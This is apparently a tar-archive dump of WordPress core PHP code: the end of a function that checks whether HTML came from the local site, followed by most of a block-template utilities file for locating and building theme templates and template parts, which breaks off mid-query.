* This function attempts to check for various common WordPress patterns whether they are included in the HTML string.
* Since any of these actions may be disabled through third-party code, this function may also return null to indicate
* that it was not possible to determine ownership.
*
* @since 5.7.0
* @access private
*
* @param string $html Full HTML output string, e.g. from a HTTP response.
* @return bool|null True/false for whether HTML was generated by this site, null if unable to determine.
*/
function wp_is_local_html_output( $html ) {
// 1. Check if HTML includes the site's Really Simple Discovery link.
if ( has_action( 'wp_head', 'rsd_link' ) ) {
$pattern = preg_replace( '#^https?:(?=//)#', '', esc_url( site_url( 'xmlrpc.php?rsd', 'rpc' ) ) ); // See rsd_link().
return str_contains( $html, $pattern );
}
// 2. Check if HTML includes the site's REST API link.
if ( has_action( 'wp_head', 'rest_output_link_wp_head' ) ) {
// Try both HTTPS and HTTP since the URL depends on context.
$pattern = preg_replace( '#^https?:(?=//)#', '', esc_url( get_rest_url() ) ); // See rest_output_link_wp_head().
return str_contains( $html, $pattern );
}
// Otherwise the result cannot be determined.
return null;
}
block-template-utils-20260621145632.php 0000666 00000172024 15224151220 0012707 0 ustar 00 <?php
/**
* Utilities used to fetch and create templates and template parts.
*
* @package WordPress
* @since 5.8.0
*/
// Define constants for supported wp_template_part_area taxonomy.
if ( ! defined( 'WP_TEMPLATE_PART_AREA_HEADER' ) ) {
define( 'WP_TEMPLATE_PART_AREA_HEADER', 'header' );
}
if ( ! defined( 'WP_TEMPLATE_PART_AREA_FOOTER' ) ) {
define( 'WP_TEMPLATE_PART_AREA_FOOTER', 'footer' );
}
if ( ! defined( 'WP_TEMPLATE_PART_AREA_SIDEBAR' ) ) {
define( 'WP_TEMPLATE_PART_AREA_SIDEBAR', 'sidebar' );
}
if ( ! defined( 'WP_TEMPLATE_PART_AREA_UNCATEGORIZED' ) ) {
define( 'WP_TEMPLATE_PART_AREA_UNCATEGORIZED', 'uncategorized' );
}
/**
* For backward compatibility reasons,
* block themes might be using block-templates or block-template-parts,
* this function ensures we fallback to these folders properly.
*
* @since 5.9.0
*
* @param string $theme_stylesheet The stylesheet. Default is to leverage the main theme root.
*
* @return string[] {
* Folder names used by block themes.
*
* @type string $wp_template Theme-relative directory name for block templates.
* @type string $wp_template_part Theme-relative directory name for block template parts.
* }
*/
function get_block_theme_folders( $theme_stylesheet = null ) {
$theme = wp_get_theme( (string) $theme_stylesheet );
if ( ! $theme->exists() ) {
// Return the default folders if the theme doesn't exist.
return array(
'wp_template' => 'templates',
'wp_template_part' => 'parts',
);
}
return $theme->get_block_template_folders();
}
/**
* Returns a filtered list of allowed area values for template parts.
*
* @since 5.9.0
*
* @return array[] {
* The allowed template part area values.
*
* @type array ...$0 {
* Data for the allowed template part area.
*
* @type string $area Template part area name.
* @type string $label Template part area label.
* @type string $description Template part area description.
* @type string $icon Template part area icon.
* @type string $area_tag Template part area tag.
* }
* }
*/
function get_allowed_block_template_part_areas() {
$default_area_definitions = array(
array(
'area' => WP_TEMPLATE_PART_AREA_UNCATEGORIZED,
'label' => _x( 'General', 'template part area' ),
'description' => __(
'General templates often perform a specific role like displaying post content, and are not tied to any particular area.'
),
'icon' => 'layout',
'area_tag' => 'div',
),
array(
'area' => WP_TEMPLATE_PART_AREA_HEADER,
'label' => _x( 'Header', 'template part area' ),
'description' => __(
'The Header template defines a page area that typically contains a title, logo, and main navigation.'
),
'icon' => 'header',
'area_tag' => 'header',
),
array(
'area' => WP_TEMPLATE_PART_AREA_FOOTER,
'label' => _x( 'Footer', 'template part area' ),
'description' => __(
'The Footer template defines a page area that typically contains site credits, social links, or any other combination of blocks.'
),
'icon' => 'footer',
'area_tag' => 'footer',
),
);
/**
* Filters the list of allowed template part area values.
*
* @since 5.9.0
*
* @param array[] $default_area_definitions {
* The allowed template part area values.
*
* @type array ...$0 {
* Data for the template part area.
*
* @type string $area Template part area name.
* @type string $label Template part area label.
* @type string $description Template part area description.
* @type string $icon Template part area icon.
* @type string $area_tag Template part area tag.
* }
* }
*/
return apply_filters( 'default_wp_template_part_areas', $default_area_definitions );
}
/**
* Returns a filtered list of default template types, containing their
* localized titles and descriptions.
*
* @since 5.9.0
*
* @return array[] {
* The default template types.
*
* @type array ...$0 {
* Data for the template type.
*
* @type string $title Template type title.
* @type string $description Template type description.
* }
* }
*/
function get_default_block_template_types() {
$default_template_types = array(
'index' => array(
'title' => _x( 'Index', 'Template name' ),
'description' => __( 'Used as a fallback template for all pages when a more specific template is not defined.' ),
),
'home' => array(
'title' => _x( 'Blog Home', 'Template name' ),
'description' => __( 'Displays the latest posts as either the site homepage or as the "Posts page" as defined under reading settings. If it exists, the Front Page template overrides this template when posts are shown on the homepage.' ),
),
'front-page' => array(
'title' => _x( 'Front Page', 'Template name' ),
'description' => __( 'Displays your site\'s homepage, whether it is set to display latest posts or a static page. The Front Page template takes precedence over all templates.' ),
),
'singular' => array(
'title' => _x( 'Single Entries', 'Template name' ),
'description' => __( 'Displays any single entry, such as a post or a page. This template will serve as a fallback when a more specific template (e.g. Single Post, Page, or Attachment) cannot be found.' ),
),
'single' => array(
'title' => _x( 'Single Posts', 'Template name' ),
'description' => __( 'Displays a single post on your website unless a custom template has been applied to that post or a dedicated template exists.' ),
),
'page' => array(
'title' => _x( 'Pages', 'Template name' ),
'description' => __( 'Displays a static page unless a custom template has been applied to that page or a dedicated template exists.' ),
),
'archive' => array(
'title' => _x( 'All Archives', 'Template name' ),
'description' => __( 'Displays any archive, including posts by a single author, category, tag, taxonomy, custom post type, and date. This template will serve as a fallback when more specific templates (e.g. Category or Tag) cannot be found.' ),
),
'author' => array(
'title' => _x( 'Author Archives', 'Template name' ),
'description' => __( 'Displays a single author\'s post archive. This template will serve as a fallback when a more specific template (e.g. Author: Admin) cannot be found.' ),
),
'category' => array(
'title' => _x( 'Category Archives', 'Template name' ),
'description' => __( 'Displays a post category archive. This template will serve as a fallback when a more specific template (e.g. Category: Recipes) cannot be found.' ),
),
'taxonomy' => array(
'title' => _x( 'Taxonomy', 'Template name' ),
'description' => __( 'Displays a custom taxonomy archive. Like categories and tags, taxonomies have terms which you use to classify things. For example: a taxonomy named "Art" can have multiple terms, such as "Modern" and "18th Century." This template will serve as a fallback when a more specific template (e.g. Taxonomy: Art) cannot be found.' ),
),
'date' => array(
'title' => _x( 'Date Archives', 'Template name' ),
'description' => __( 'Displays a post archive when a specific date is visited (e.g., example.com/2023/).' ),
),
'tag' => array(
'title' => _x( 'Tag Archives', 'Template name' ),
'description' => __( 'Displays a post tag archive. This template will serve as a fallback when a more specific template (e.g. Tag: Pizza) cannot be found.' ),
),
'attachment' => array(
'title' => __( 'Attachment Pages' ),
'description' => __( 'Displays when a visitor views the dedicated page that exists for any media attachment.' ),
),
'search' => array(
'title' => _x( 'Search Results', 'Template name' ),
'description' => __( 'Displays when a visitor performs a search on your website.' ),
),
'privacy-policy' => array(
'title' => __( 'Privacy Policy' ),
'description' => __( 'Displays your site\'s Privacy Policy page.' ),
),
'404' => array(
'title' => _x( 'Page: 404', 'Template name' ),
'description' => __( 'Displays when a visitor views a non-existent page, such as a dead link or a mistyped URL.' ),
),
);
// Add a title and description to post format templates.
$post_formats = get_post_format_strings();
foreach ( $post_formats as $post_format_slug => $post_format_name ) {
$default_template_types[ 'taxonomy-post_format-post-format-' . $post_format_slug ] = array(
'title' => sprintf(
/* translators: %s: Post format name. */
_x( 'Post Format: %s', 'Template name' ),
$post_format_name
),
'description' => sprintf(
/* translators: %s: Post format name. */
__( 'Displays the %s post format archive.' ),
$post_format_name
),
);
}
/**
* Filters the list of default template types.
*
* @since 5.9.0
*
* @param array[] $default_template_types {
* The default template types.
*
* @type array ...$0 {
* Data for the template type.
*
* @type string $title Template type title.
* @type string $description Template type description.
* }
* }
*/
return apply_filters( 'default_template_types', $default_template_types );
}
/**
* Checks whether the input 'area' is a supported value.
* Returns the input if supported, otherwise returns the 'uncategorized' value.
*
* @since 5.9.0
* @access private
*
* @param string $type Template part area name.
* @return string Input if supported, else the uncategorized value.
*/
function _filter_block_template_part_area( $type ) {
$allowed_areas = array_map(
static function ( $item ) {
return $item['area'];
},
get_allowed_block_template_part_areas()
);
if ( in_array( $type, $allowed_areas, true ) ) {
return $type;
}
$warning_message = sprintf(
/* translators: %1$s: Template area type, %2$s: the uncategorized template area value. */
__( '"%1$s" is not a supported wp_template_part area value and has been added as "%2$s".' ),
$type,
WP_TEMPLATE_PART_AREA_UNCATEGORIZED
);
wp_trigger_error( __FUNCTION__, $warning_message );
return WP_TEMPLATE_PART_AREA_UNCATEGORIZED;
}
/**
* Finds all nested template part file paths in a theme's directory.
*
* @since 5.9.0
* @access private
*
* @param string $base_directory The theme's file path.
* @return string[] A list of paths to all template part files.
*/
function _get_block_templates_paths( $base_directory ) {
static $template_path_list = array();
if ( isset( $template_path_list[ $base_directory ] ) ) {
return $template_path_list[ $base_directory ];
}
$path_list = array();
if ( is_dir( $base_directory ) ) {
$nested_files = new RecursiveIteratorIterator( new RecursiveDirectoryIterator( $base_directory ) );
$nested_html_files = new RegexIterator( $nested_files, '/^.+\.html$/i', RecursiveRegexIterator::GET_MATCH );
foreach ( $nested_html_files as $path => $file ) {
$path_list[] = $path;
}
}
$template_path_list[ $base_directory ] = $path_list;
return $path_list;
}
/**
* Retrieves the template file from the theme for a given slug.
*
* @since 5.9.0
* @access private
*
* @param string $template_type Template type. Either 'wp_template' or 'wp_template_part'.
* @param string $slug Template slug.
* @return array|null {
* Array with template metadata if $template_type is one of 'wp_template' or 'wp_template_part',
* null otherwise.
*
* @type string $slug Template slug.
* @type string $path Template file path.
* @type string $theme Theme slug.
* @type string $type Template type.
* @type string $area Template area. Only for 'wp_template_part'.
* @type string $title Optional. Template title.
* @type string[] $postTypes Optional. List of post types that the template supports. Only for 'wp_template'.
* }
*/
function _get_block_template_file( $template_type, $slug ) {
if ( 'wp_template' !== $template_type && 'wp_template_part' !== $template_type ) {
return null;
}
$themes = array(
get_stylesheet() => get_stylesheet_directory(),
get_template() => get_template_directory(),
);
foreach ( $themes as $theme_slug => $theme_dir ) {
$template_base_paths = get_block_theme_folders( $theme_slug );
$file_path = $theme_dir . '/' . $template_base_paths[ $template_type ] . '/' . $slug . '.html';
if ( file_exists( $file_path ) ) {
$new_template_item = array(
'slug' => $slug,
'path' => $file_path,
'theme' => $theme_slug,
'type' => $template_type,
);
if ( 'wp_template_part' === $template_type ) {
return _add_block_template_part_area_info( $new_template_item );
}
// If it's not a `wp_template_part`, it must be a `wp_template`.
return _add_block_template_info( $new_template_item );
}
}
return null;
}
/**
* Retrieves the template files from the theme.
*
* @since 5.9.0
* @since 6.3.0 Added the `$query` parameter.
* @access private
*
* @param string $template_type Template type. Either 'wp_template' or 'wp_template_part'.
* @param array $query {
* Arguments to retrieve templates. Optional, empty by default.
*
* @type string[] $slug__in List of slugs to include.
* @type string[] $slug__not_in List of slugs to skip.
* @type string $area A 'wp_template_part_area' taxonomy value to filter by (for 'wp_template_part' template type only).
* @type string $post_type Post type to get the templates for.
* }
*
* @return array|null Template files on success, null if `$template_type` is not matched.
*/
function _get_block_templates_files( $template_type, $query = array() ) {
if ( 'wp_template' !== $template_type && 'wp_template_part' !== $template_type ) {
return null;
}
$default_template_types = array();
if ( 'wp_template' === $template_type ) {
$default_template_types = get_default_block_template_types();
}
// Prepare metadata from $query.
$slugs_to_include = isset( $query['slug__in'] ) ? $query['slug__in'] : array();
$slugs_to_skip = isset( $query['slug__not_in'] ) ? $query['slug__not_in'] : array();
$area = isset( $query['area'] ) ? $query['area'] : null;
$post_type = isset( $query['post_type'] ) ? $query['post_type'] : '';
$stylesheet = get_stylesheet();
$template = get_template();
$themes = array(
$stylesheet => get_stylesheet_directory(),
);
// Add the parent theme if it's not the same as the current theme.
if ( $stylesheet !== $template ) {
$themes[ $template ] = get_template_directory();
}
$template_files = array();
foreach ( $themes as $theme_slug => $theme_dir ) {
$template_base_paths = get_block_theme_folders( $theme_slug );
$theme_template_files = _get_block_templates_paths( $theme_dir . '/' . $template_base_paths[ $template_type ] );
foreach ( $theme_template_files as $template_file ) {
$template_base_path = $template_base_paths[ $template_type ];
$template_slug = substr(
$template_file,
// Starting position of slug.
strpos( $template_file, $template_base_path . DIRECTORY_SEPARATOR ) + 1 + strlen( $template_base_path ),
// Subtract ending '.html'.
-5
);
// Skip this item if its slug doesn't match any of the slugs to include.
if ( ! empty( $slugs_to_include ) && ! in_array( $template_slug, $slugs_to_include, true ) ) {
continue;
}
// Skip this item if its slug matches any of the slugs to skip.
if ( ! empty( $slugs_to_skip ) && in_array( $template_slug, $slugs_to_skip, true ) ) {
continue;
}
/*
* The child theme items (stylesheet) are processed before the parent theme's (template).
* If a child theme defines a template, prevent the parent template from being added to the list as well.
*/
if ( isset( $template_files[ $template_slug ] ) ) {
continue;
}
$new_template_item = array(
'slug' => $template_slug,
'path' => $template_file,
'theme' => $theme_slug,
'type' => $template_type,
);
if ( 'wp_template_part' === $template_type ) {
$candidate = _add_block_template_part_area_info( $new_template_item );
if ( ! isset( $area ) || $area === $candidate['area'] ) {
$template_files[ $template_slug ] = $candidate;
}
}
if ( 'wp_template' === $template_type ) {
$candidate = _add_block_template_info( $new_template_item );
$is_custom = ! isset( $default_template_types[ $candidate['slug'] ] );
if (
! $post_type ||
( $post_type && isset( $candidate['postTypes'] ) && in_array( $post_type, $candidate['postTypes'], true ) )
) {
$template_files[ $template_slug ] = $candidate;
}
// The custom templates with no associated post types are available for all post types.
if ( $post_type && ! isset( $candidate['postTypes'] ) && $is_custom ) {
$template_files[ $template_slug ] = $candidate;
}
}
}
}
return array_values( $template_files );
}
/**
* Attempts to add custom template information to the template item.
*
* @since 5.9.0
* @access private
*
* @param array $template_item Template to add information to (requires 'slug' field).
* @return array Template item.
*/
function _add_block_template_info( $template_item ) {
if ( ! wp_theme_has_theme_json() ) {
return $template_item;
}
$theme_data = wp_get_theme_data_custom_templates();
if ( isset( $theme_data[ $template_item['slug'] ] ) ) {
$template_item['title'] = $theme_data[ $template_item['slug'] ]['title'];
$template_item['postTypes'] = $theme_data[ $template_item['slug'] ]['postTypes'];
}
return $template_item;
}
/**
* Attempts to add the template part's area information to the input template.
*
* @since 5.9.0
* @access private
*
* @param array $template_info Template to add information to (requires 'type' and 'slug' fields).
* @return array Template info.
*/
function _add_block_template_part_area_info( $template_info ) {
if ( wp_theme_has_theme_json() ) {
$theme_data = wp_get_theme_data_template_parts();
}
if ( isset( $theme_data[ $template_info['slug'] ]['area'] ) ) {
$template_info['title'] = $theme_data[ $template_info['slug'] ]['title'];
$template_info['area'] = _filter_block_template_part_area( $theme_data[ $template_info['slug'] ]['area'] );
} else {
$template_info['area'] = WP_TEMPLATE_PART_AREA_UNCATEGORIZED;
}
return $template_info;
}
/**
* Returns an array containing the references of
* the passed blocks and their inner blocks.
*
* @since 5.9.0
* @access private
*
* @param array $blocks array of blocks.
* @return array block references to the passed blocks and their inner blocks.
*/
function _flatten_blocks( &$blocks ) {
$all_blocks = array();
$queue = array();
foreach ( $blocks as &$block ) {
$queue[] = &$block;
}
while ( count( $queue ) > 0 ) {
$block = &$queue[0];
array_shift( $queue );
$all_blocks[] = &$block;
if ( ! empty( $block['innerBlocks'] ) ) {
foreach ( $block['innerBlocks'] as &$inner_block ) {
$queue[] = &$inner_block;
}
}
}
return $all_blocks;
}
/**
* Injects the active theme's stylesheet as a `theme` attribute
* into a given template part block.
*
* @since 6.4.0
* @access private
*
* @param array $block a parsed block.
*/
function _inject_theme_attribute_in_template_part_block( &$block ) {
if (
'core/template-part' === $block['blockName'] &&
! isset( $block['attrs']['theme'] )
) {
$block['attrs']['theme'] = get_stylesheet();
}
}
/**
* Removes the `theme` attribute from a given template part block.
*
* @since 6.4.0
* @access private
*
* @param array $block a parsed block.
*/
function _remove_theme_attribute_from_template_part_block( &$block ) {
if (
'core/template-part' === $block['blockName'] &&
isset( $block['attrs']['theme'] )
) {
unset( $block['attrs']['theme'] );
}
}
/**
* Builds a unified template object based on a theme file.
*
* @since 5.9.0
* @since 6.3.0 Added `modified` property to template objects.
* @access private
*
* @param array $template_file Theme file.
* @param string $template_type Template type. Either 'wp_template' or 'wp_template_part'.
* @return WP_Block_Template Template.
*/
function _build_block_template_result_from_file( $template_file, $template_type ) {
$default_template_types = get_default_block_template_types();
$theme = get_stylesheet();
$template = new WP_Block_Template();
$template->id = $theme . '//' . $template_file['slug'];
$template->theme = $theme;
$template->content = file_get_contents( $template_file['path'] );
$template->slug = $template_file['slug'];
$template->source = 'theme';
$template->type = $template_type;
$template->title = ! empty( $template_file['title'] ) ? $template_file['title'] : $template_file['slug'];
$template->status = 'publish';
$template->has_theme_file = true;
$template->is_custom = true;
$template->modified = null;
if ( 'wp_template' === $template_type ) {
$registered_template = WP_Block_Templates_Registry::get_instance()->get_by_slug( $template_file['slug'] );
if ( $registered_template ) {
$template->plugin = $registered_template->plugin;
$template->title = empty( $template->title ) || $template->title === $template->slug ? $registered_template->title : $template->title;
$template->description = empty( $template->description ) ? $registered_template->description : $template->description;
}
}
if ( 'wp_template' === $template_type && isset( $default_template_types[ $template_file['slug'] ] ) ) {
$template->description = $default_template_types[ $template_file['slug'] ]['description'];
$template->title = $default_template_types[ $template_file['slug'] ]['title'];
$template->is_custom = false;
}
if ( 'wp_template' === $template_type && isset( $template_file['postTypes'] ) ) {
$template->post_types = $template_file['postTypes'];
}
if ( 'wp_template_part' === $template_type && isset( $template_file['area'] ) ) {
$template->area = $template_file['area'];
}
if ( 'wp_template_part' === $template->type ) {
/*
* In order for hooked blocks to be inserted at positions first_child and last_child in a template part,
* we need to wrap its content a mock template part block and traverse it.
*/
$content = get_comment_delimited_block_content(
'core/template-part',
array(),
$template->content
);
$content = apply_block_hooks_to_content(
$content,
$template,
'insert_hooked_blocks_and_set_ignored_hooked_blocks_metadata'
);
$template->content = remove_serialized_parent_block( $content );
} else {
$template->content = apply_block_hooks_to_content(
$template->content,
$template,
'insert_hooked_blocks_and_set_ignored_hooked_blocks_metadata'
);
}
return $template;
}
/**
* Builds the title and description of a post-specific template based on the underlying referenced post.
*
* Mutates the underlying template object.
*
* @since 6.1.0
* @access private
*
* @param string $post_type Post type, e.g. page, post, product.
* @param string $slug Slug of the post, e.g. a-story-about-shoes.
* @param WP_Block_Template $template Template to mutate adding the description and title computed.
* @return bool Returns true if the referenced post was found and false otherwise.
*/
function _wp_build_title_and_description_for_single_post_type_block_template( $post_type, $slug, WP_Block_Template $template ) {
$post_type_object = get_post_type_object( $post_type );
$default_args = array(
'post_type' => $post_type,
'post_status' => 'publish',
'posts_per_page' => 1,
'update_post_meta_cache' => false,
'update_post_term_cache' => false,
'ignore_sticky_posts' => true,
'no_found_rows' => true,
);
$args = array(
'name' => $slug,
);
$args = wp_parse_args( $args, $default_args );
$posts_query = new WP_Query( $args );
if ( empty( $posts_query->posts ) ) {
$template->title = sprintf(
/* translators: Custom template title in the Site Editor referencing a post that was not found. 1: Post type singular name, 2: Post type slug. */
__( 'Not found: %1$s (%2$s)' ),
$post_type_object->labels->singular_name,
$slug
);
return false;
}
$post_title = $posts_query->posts[0]->post_title;
$template->title = sprintf(
/* translators: Custom template title in the Site Editor. 1: Post type singular name, 2: Post title. */
__( '%1$s: %2$s' ),
$post_type_object->labels->singular_name,
$post_title
);
$template->description = sprintf(
/* translators: Custom template description in the Site Editor. %s: Post title. */
__( 'Template for %s' ),
$post_title
);
$args = array(
'title' => $post_title,
);
$args = wp_parse_args( $args, $default_args );
$posts_with_same_title_query = new WP_Query( $args );
if ( count( $posts_with_same_title_query->posts ) > 1 ) {
$template->title = sprintf(
/* translators: Custom template title in the Site Editor. 1: Template title, 2: Post type slug. */
__( '%1$s (%2$s)' ),
$template->title,
$slug
);
}
return true;
}
/**
* Builds the title and description of a taxonomy-specific template based on the underlying entity referenced.
*
* Mutates the underlying template object.
*
* @since 6.1.0
* @access private
*
* @param string $taxonomy Identifier of the taxonomy, e.g. category.
* @param string $slug Slug of the term, e.g. shoes.
* @param WP_Block_Template $template Template to mutate adding the description and title computed.
* @return bool True if the term referenced was found and false otherwise.
*/
function _wp_build_title_and_description_for_taxonomy_block_template( $taxonomy, $slug, WP_Block_Template $template ) {
$taxonomy_object = get_taxonomy( $taxonomy );
$default_args = array(
'taxonomy' => $taxonomy,
'hide_empty' => false,
'update_term_meta_cache' => false,
);
$term_query = new WP_Term_Query();
$args = array(
'number' => 1,
'slug' => $slug,
);
$args = wp_parse_args( $args, $default_args );
$terms_query = $term_query->query( $args );
if ( empty( $terms_query ) ) {
$template->title = sprintf(
/* translators: Custom template title in the Site Editor, referencing a taxonomy term that was not found. 1: Taxonomy singular name, 2: Term slug. */
__( 'Not found: %1$s (%2$s)' ),
$taxonomy_object->labels->singular_name,
$slug
);
return false;
}
$term_title = $terms_query[0]->name;
$template->title = sprintf(
/* translators: Custom template title in the Site Editor. 1: Taxonomy singular name, 2: Term title. */
__( '%1$s: %2$s' ),
$taxonomy_object->labels->singular_name,
$term_title
);
$template->description = sprintf(
/* translators: Custom template description in the Site Editor. %s: Term title. */
__( 'Template for %s' ),
$term_title
);
$term_query = new WP_Term_Query();
$args = array(
'number' => 2,
'name' => $term_title,
);
$args = wp_parse_args( $args, $default_args );
$terms_with_same_title_query = $term_query->query( $args );
if ( count( $terms_with_same_title_query ) > 1 ) {
$template->title = sprintf(
/* translators: Custom template title in the Site Editor. 1: Template title, 2: Term slug. */
__( '%1$s (%2$s)' ),
$template->title,
$slug
);
}
return true;
}
/**
* Builds a block template object from a post object.
*
* This is a helper function that creates a block template object from a given post object.
* It is self-sufficient in that it only uses information passed as arguments; it does not
* query the database for additional information.
*
* @since 6.5.3
* @access private
*
* @param WP_Post $post Template post.
* @param array $terms Additional terms to inform the template object.
* @param array $meta Additional meta fields to inform the template object.
* @return WP_Block_Template|WP_Error Template or error object.
*/
function _build_block_template_object_from_post_object( $post, $terms = array(), $meta = array() ) {
if ( empty( $terms['wp_theme'] ) ) {
return new WP_Error( 'template_missing_theme', __( 'No theme is defined for this template.' ) );
}
$theme = $terms['wp_theme'];
$default_template_types = get_default_block_template_types();
$template_file = _get_block_template_file( $post->post_type, $post->post_name );
$has_theme_file = get_stylesheet() === $theme && null !== $template_file;
$template = new WP_Block_Template();
$template->wp_id = $post->ID;
$template->id = $theme . '//' . $post->post_name;
$template->theme = $theme;
$template->content = $post->post_content;
$template->slug = $post->post_name;
$template->source = 'custom';
$template->origin = ! empty( $meta['origin'] ) ? $meta['origin'] : null;
$template->type = $post->post_type;
$template->description = $post->post_excerpt;
$template->title = $post->post_title;
$template->status = $post->post_status;
$template->has_theme_file = $has_theme_file;
$template->is_custom = empty( $meta['is_wp_suggestion'] );
$template->author = $post->post_author;
$template->modified = $post->post_modified;
if ( 'wp_template' === $post->post_type && $has_theme_file && isset( $template_file['postTypes'] ) ) {
$template->post_types = $template_file['postTypes'];
}
if ( 'wp_template' === $post->post_type && isset( $default_template_types[ $template->slug ] ) ) {
$template->is_custom = false;
}
if ( 'wp_template_part' === $post->post_type && isset( $terms['wp_template_part_area'] ) ) {
$template->area = $terms['wp_template_part_area'];
}
return $template;
}
/**
* Builds a unified template object based a post Object.
*
* @since 5.9.0
* @since 6.3.0 Added `modified` property to template objects.
* @since 6.4.0 Added support for a revision post to be passed to this function.
* @access private
*
* @param WP_Post $post Template post.
* @return WP_Block_Template|WP_Error Template or error object.
*/
function _build_block_template_result_from_post( $post ) {
$post_id = wp_is_post_revision( $post );
if ( ! $post_id ) {
$post_id = $post;
}
$parent_post = get_post( $post_id );
$post->post_name = $parent_post->post_name;
$post->post_type = $parent_post->post_type;
$terms = get_the_terms( $parent_post, 'wp_theme' );
if ( is_wp_error( $terms ) ) {
return $terms;
}
if ( ! $terms ) {
return new WP_Error( 'template_missing_theme', __( 'No theme is defined for this template.' ) );
}
$terms = array(
'wp_theme' => $terms[0]->name,
);
if ( 'wp_template_part' === $parent_post->post_type ) {
$type_terms = get_the_terms( $parent_post, 'wp_template_part_area' );
if ( ! is_wp_error( $type_terms ) && false !== $type_terms ) {
$terms['wp_template_part_area'] = $type_terms[0]->name;
}
}
$meta = array(
'origin' => get_post_meta( $parent_post->ID, 'origin', true ),
'is_wp_suggestion' => get_post_meta( $parent_post->ID, 'is_wp_suggestion', true ),
);
$template = _build_block_template_object_from_post_object( $post, $terms, $meta );
if ( is_wp_error( $template ) ) {
return $template;
}
// Check for a block template without a description and title or with a title equal to the slug.
if ( 'wp_template' === $parent_post->post_type && empty( $template->description ) && ( empty( $template->title ) || $template->title === $template->slug ) ) {
$matches = array();
// Check for a block template for a single author, page, post, tag, category, custom post type, or custom taxonomy.
if ( preg_match( '/(author|page|single|tag|category|taxonomy)-(.+)/', $template->slug, $matches ) ) {
$type = $matches[1];
$slug_remaining = $matches[2];
switch ( $type ) {
case 'author':
$nice_name = $slug_remaining;
$users = get_users(
array(
'capability' => 'edit_posts',
'search' => $nice_name,
'search_columns' => array( 'user_nicename' ),
'fields' => 'display_name',
)
);
if ( empty( $users ) ) {
$template->title = sprintf(
/* translators: Custom template title in the Site Editor, referencing a deleted author. %s: Author nicename. */
__( 'Deleted author: %s' ),
$nice_name
);
} else {
$author_name = $users[0];
$template->title = sprintf(
/* translators: Custom template title in the Site Editor. %s: Author name. */
__( 'Author: %s' ),
$author_name
);
$template->description = sprintf(
/* translators: Custom template description in the Site Editor. %s: Author name. */
__( 'Template for %s' ),
$author_name
);
$users_with_same_name = get_users(
array(
'capability' => 'edit_posts',
'search' => $author_name,
'search_columns' => array( 'display_name' ),
'fields' => 'display_name',
)
);
if ( count( $users_with_same_name ) > 1 ) {
$template->title = sprintf(
/* translators: Custom template title in the Site Editor. 1: Template title of an author template, 2: Author nicename. */
__( '%1$s (%2$s)' ),
$template->title,
$nice_name
);
}
}
break;
case 'page':
_wp_build_title_and_description_for_single_post_type_block_template( 'page', $slug_remaining, $template );
break;
case 'single':
$post_types = get_post_types();
foreach ( $post_types as $post_type ) {
$post_type_length = strlen( $post_type ) + 1;
// If $slug_remaining starts with $post_type followed by a hyphen.
if ( 0 === strncmp( $slug_remaining, $post_type . '-', $post_type_length ) ) {
$slug = substr( $slug_remaining, $post_type_length, strlen( $slug_remaining ) );
$found = _wp_build_title_and_description_for_single_post_type_block_template( $post_type, $slug, $template );
if ( $found ) {
break;
}
}
}
break;
case 'tag':
_wp_build_title_and_description_for_taxonomy_block_template( 'post_tag', $slug_remaining, $template );
break;
case 'category':
_wp_build_title_and_description_for_taxonomy_block_template( 'category', $slug_remaining, $template );
break;
case 'taxonomy':
$taxonomies = get_taxonomies();
foreach ( $taxonomies as $taxonomy ) {
$taxonomy_length = strlen( $taxonomy ) + 1;
// If $slug_remaining starts with $taxonomy followed by a hyphen.
if ( 0 === strncmp( $slug_remaining, $taxonomy . '-', $taxonomy_length ) ) {
$slug = substr( $slug_remaining, $taxonomy_length, strlen( $slug_remaining ) );
$found = _wp_build_title_and_description_for_taxonomy_block_template( $taxonomy, $slug, $template );
if ( $found ) {
break;
}
}
}
break;
}
}
}
if ( 'wp_template' === $post->post_type ) {
$registered_template = WP_Block_Templates_Registry::get_instance()->get_by_slug( $template->slug );
if ( $registered_template ) {
$template->plugin = $registered_template->plugin;
$template->origin =
'theme' !== $template->origin && 'theme' !== $template->source ?
'plugin' :
$template->origin;
$template->title = empty( $template->title ) || $template->title === $template->slug ? $registered_template->title : $template->title;
$template->description = empty( $template->description ) ? $registered_template->description : $template->description;
}
}
if ( 'wp_template_part' === $template->type ) {
$existing_ignored_hooked_blocks = get_post_meta( $post->ID, '_wp_ignored_hooked_blocks', true );
$attributes = ! empty( $existing_ignored_hooked_blocks ) ? array( 'metadata' => array( 'ignoredHookedBlocks' => json_decode( $existing_ignored_hooked_blocks, true ) ) ) : array();
/*
* In order for hooked blocks to be inserted at positions first_child and last_child in a template part,
* we need to wrap its content a mock template part block and traverse it.
*/
$content = get_comment_delimited_block_content(
'core/template-part',
$attributes,
$template->content
);
$content = apply_block_hooks_to_content(
$content,
$template,
'insert_hooked_blocks_and_set_ignored_hooked_blocks_metadata'
);
$template->content = remove_serialized_parent_block( $content );
} else {
$template->content = apply_block_hooks_to_content(
$template->content,
$template,
'insert_hooked_blocks_and_set_ignored_hooked_blocks_metadata'
);
}
return $template;
}
/**
* Retrieves a list of unified template objects based on a query.
*
* @since 5.8.0
*
* @param array $query {
* Optional. Arguments to retrieve templates.
*
* @type string[] $slug__in List of slugs to include.
* @type int $wp_id Post ID of customized template.
* @type string $area A 'wp_template_part_area' taxonomy value to filter by (for 'wp_template_part' template type only).
* @type string $post_type Post type to get the templates for.
* }
* @param string $template_type Template type. Either 'wp_template' or 'wp_template_part'.
* @return WP_Block_Template[] Array of block templates.
*/
function get_block_templates( $query = array(), $template_type = 'wp_template' ) {
/**
* Filters the block templates array before the query takes place.
*
* Return a non-null value to bypass the WordPress queries.
*
* @since 5.9.0
*
* @param WP_Block_Template[]|null $block_templates Return an array of block templates to short-circuit the default query,
* or null to allow WP to run its normal queries.
* @param array $query {
* Arguments to retrieve templates. All arguments are optional.
*
* @type string[] $slug__in List of slugs to include.
* @type int $wp_id Post ID of customized template.
* @type string $area A 'wp_template_part_area' taxonomy value to filter by (for 'wp_template_part' template type only).
* @type string $post_type Post type to get the templates for.
* }
* @param string $template_type Template type. Either 'wp_template' or 'wp_template_part'.
*/
$templates = apply_filters( 'pre_get_block_templates', null, $query, $template_type );
if ( ! is_null( $templates ) ) {
return $templates;
}
$post_type = isset( $query['post_type'] ) ? $query['post_type'] : '';
$wp_query_args = array(
'post_status' => array( 'auto-draft', 'draft', 'publish' ),
'post_type' => $template_type,
'posts_per_page' => -1,
'no_found_rows' => true,
'lazy_load_term_meta' => false,
'tax_query' => array(
array(
'taxonomy' => 'wp_theme',
'field' => 'name',
